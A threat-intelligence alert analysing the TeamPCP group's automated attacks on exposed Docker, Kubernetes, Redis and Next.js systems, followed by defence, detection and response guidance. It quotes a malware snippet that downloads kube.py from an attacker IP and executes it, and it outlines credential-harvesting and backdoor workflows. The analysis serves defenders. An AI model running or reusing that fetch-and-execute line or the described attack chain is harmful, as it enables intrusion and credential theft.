Threat Alert: Cloud‑Native Cybercrime Group TeamPCP Targets Docker, Kubernetes, and Redis

Overview

TeamPCP (also known as PCPcat, ShellForce, DeadCatx3) began large‑scale cloud‑native attacks in December 2025. The group systematically exploits exposed Docker APIs, Kubernetes clusters, Redis servers, unauthenticated Ray dashboards, and the React2Shell vulnerability (CVE‑2025‑29927) in Next.js applications. Researchers estimate at least 60 000 compromised servers, with 61 % on Azure and 36 % on AWS.

Technical Analysis

Attack Chain Reconstruction

The attack chain is fully automated from Internet scanning to persistence:

Initial Access – Unauthenticated Docker API access, exploitation of CVE‑2025‑29927, and scanning of mis‑configured Redis servers provide footholds.

Persistence – Malicious containers are deployed, systemd services are created, and privileged DaemonSets are installed to maintain control inside Kubernetes clusters.

Data Exfiltration – Custom scripts harvest environment variables, Git credentials, SSH keys, and cloud provider tokens, sending them over encrypted channels.

Core Tool Analysis

proxy.sh – Operational Backbone

proxy.sh orchestrates infrastructure deployment and scaling. Its functions include installing proxy/tunnel tools, deploying additional scanners, registering system services for persistence, and delivering Kubernetes‑specific payloads. When run inside a Kubernetes pod it detects the environment and downloads kube.py:

if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]
curl -fsSL "http://44.252.85.168:666/files/kube.py" -o /tmp/k8s.py 2>/dev/null
python3 /tmp/k8s.py

Kubernetes environment detection code

kube.py – Cluster Penetration Tool

Cluster Credential Harvesting : Reads service‑account tokens and configuration data.

Automated Lateral Movement : Enumerates namespaces and pods via the Kubernetes API and executes malicious commands in each container.

DaemonSet Backdoor Deployment : Installs privileged containers on every node, mounting the host filesystem for persistent control.

react.py – React2Shell Exploit Tool

Automates exploitation of CVE‑2025‑29927 in vulnerable Next.js applications. Workflow:

Fetch target domain list from a central API.

Craft a multipart request that triggers the vulnerability.

Execute system commands to collect .env files, cloud credentials, Git configs, and SSH keys.

Deploy persistent backdoors through multiple mechanisms.

Malware Modules

Scanner Module (pcpcat.py) : Performs large‑scale scans for exposed Docker APIs and Ray dashboards, then automatically deploys malicious containers.

Cryptocurrency Mining Module : Uses compromised servers for Monero mining, hiding the miner with double base64 encoding and zip compression.

Tunnel Proxy Module : Deploys open‑source tools such as FRPS and gost to build a distributed proxy network for further attacks or rental.

Victim Analysis

At least 60 000 servers have been compromised. Cloud‑provider distribution: Azure 61 %, AWS 36 %, GCP 2 %, others <1 %.

Data leaks comprise 27 GB across 17 TeamPCP dumps, 13 ShellForce dumps, and 19 ZIP archives, containing personal identifiers, resumes, and credential files.

MITRE ATT&CK Mapping

Initial Access : T1190 (Public‑Facing Application) via React2Shell; T1133 (External Remote Services) via unauthenticated Docker, Kubernetes, Redis, Ray APIs.

Execution : T1059 (Command‑Shell) and T1609 (Container Commands).

Persistence : T1053.003 (Cron), T1525 (Image Implant), T1610 (Container Deployment), T1611 (Host Escape).

Privilege Escalation : T1068 (Privilege Escalation) and T1611 (Host Escape).

Credential Access : T1552.001 (Credentials in Files) and T1528 (Application Access Token).

Command & Control : T1090 (Proxy) and T1573 (Encrypted Channel).

Impact : T1496 (Resource Hijacking) via XMRig mining and T1486 (Data Encrypted for Impact) via ransomware.

Defense Recommendations

Prevention

Disable public exposure of Docker APIs.

Enforce strong authentication and authorization for Kubernetes APIs.

Close unused management interfaces.

Implement network segmentation to restrict control‑plane access.

Shift‑Left CI/CD Security

Scan container images during build and remove secrets.

Audit IaC configurations to avoid key leakage.

Apply least‑privilege principles to service accounts.

Avoid bundling .env files or SSH keys into images.

Runtime Monitoring

Deploy container security solutions to detect anomalous behavior.

Watch for privileged containers and dangerous mounts.

Monitor outbound traffic for data exfiltration signs.

Track characteristics of cryptocurrency miners.

Detection Strategies

Control‑Plane Monitoring

Detect unauthorized new containers.

Identify unfamiliar DaemonSets or Jobs.

Alert on Ray job submissions from unknown IPs.

Watch Redis for dangerous commands like CONFIG or SLAVEOF.

Network and Endpoint Detection

Flag unusual GitHub download activity.

Identify traffic from tools such as Tor, FRPS, gost, or Sliver.

Monitor processes with abnormally high CPU usage.

Detect large‑scale internal network scans.

When a single container shows signs of compromise, expand the investigation to the entire cluster, as TeamPCP rarely limits itself to one pod.

Response and Recovery

Assume the whole cloud environment is compromised and take immediate actions:

Block all outbound connections from affected servers.

Isolate the impacted subnet.

Disable external access to all management APIs.

Remove Persistence

Delete unknown containers and images.

Remove rogue DaemonSets.

Delete malicious systemd services.

Rotate all cloud provider credentials.

Rebuild Infrastructure

Redeploy nodes with clean images.

Recreate Kubernetes clusters from scratch.

Use IaC templates for application deployment.

Ensure the new environment contains no legacy configurations.

Post‑Incident Audit

Audit all exposed APIs and services.

Rotate all cloud credentials and keys.

Review CI/CD pipeline security.

Deploy continuous runtime monitoring.